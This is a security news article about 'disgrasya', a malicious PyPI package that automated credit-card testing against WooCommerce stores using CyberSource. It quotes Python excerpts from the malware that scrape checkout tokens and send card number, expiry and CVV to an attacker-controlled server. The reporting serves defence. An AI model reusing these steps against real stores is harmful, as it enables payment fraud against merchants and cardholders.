A sophisticated malicious Python package named “disgrasya” has been discovered on the PyPI repository, containing a fully automated carding script specifically targeting WooCommerce stores.
This package, whose name translates to “disaster” in Filipino slang, enables attackers to test stolen credit card information against real e-commerce payment systems with minimal technical expertise required.
The malicious code executes a stealth attack by emulating legitimate customer checkout behavior, making it particularly difficult for fraud detection systems to identify and block.
.png
)
Unlike typical supply chain attacks relying on typosquatting or deceptive naming, “disgrasya” made no attempt to disguise its malicious nature.
Instead, it openly served as a distribution mechanism for fraudsters seeking to validate stolen credit card information.
The package specifically targets merchants using WooCommerce with CyberSource as their payment gateway, creating a specialized attack vector against these widely-used e-commerce systems.
Socket.dev researchers identified that the package had been downloaded over 34,860 times before discovery, indicating widespread distribution among potential attackers.
The malicious payload first appeared in version 7.36.9, with all subsequent versions carrying the same embedded attack logic. This substantial download count suggests the tool may already be in active use across numerous fraud campaigns.
The carding attack facilitated by this package represents a growing financial threat to businesses.
Industry research estimates online payment fraud will cost merchants over $362 billion globally between 2023 and 2028, with annual losses nearly doubling from $38 billion in 2023 to $91 billion by 2028—a 140% increase.
Attack Mechanism: Multi-Stage Checkout Simulation
The malware operates through a carefully orchestrated multi-stage process designed to mimic legitimate customer behavior while validating stolen credit card information.
Initially, the script identifies a product on the target WooCommerce store by extracting a product ID through a simple GET request and HTML parsing:-
url = f"https://{domain}/?=&post_type=product"
response = session.get(url, proxies=proxy)
split_text = response.text.split('data-product_id="')
id = split_text[1].split('"')[0]After identifying a product, the script adds it to a cart via WooCommerce’s AJAX endpoint, simulating a standard shopping process.
It then extracts critical security tokens from the checkout page—the CSRF nonce and CyberSource capture_context—which are essential for processing legitimate payments:-
url = f"https://{domain}/checkout/"
response = session.get(url, proxies=proxy)
checkoutNonce = response.text.split('name="woocommerce-process-checkout-nonce" value="')[1].split('"')
capture_context = response.text.split('"capture_context":"')[1].split('"')[0]The most concerning aspect involves the exfiltration of stolen credit card data to an attacker-controlled server (railgunmisaka.com), where the data is tokenized before being submitted to the payment gateway:-
url = "https://www.railgunmisaka.com/cybersourceFlexV2"
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
data = {
"card": f"{cc}|{mm}|{yy}|{cvv}",
"capture_context": capture_context
}What makes this attack particularly dangerous is its perfect simulation of legitimate checkout behavior. Every action—from browsing products to completing payment—follows normal user patterns that rarely trigger fraud detection systems.
The script even uses randomized customer information and handles both successful and failed transactions appropriately, making detection exceptionally difficult.
While this specific package has been removed from PyPI, the technique remains viable and could reappear under different package names, highlighting the need for enhanced security monitoring for both Python package repositories and e-commerce checkout systems.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try 50 Request for Free
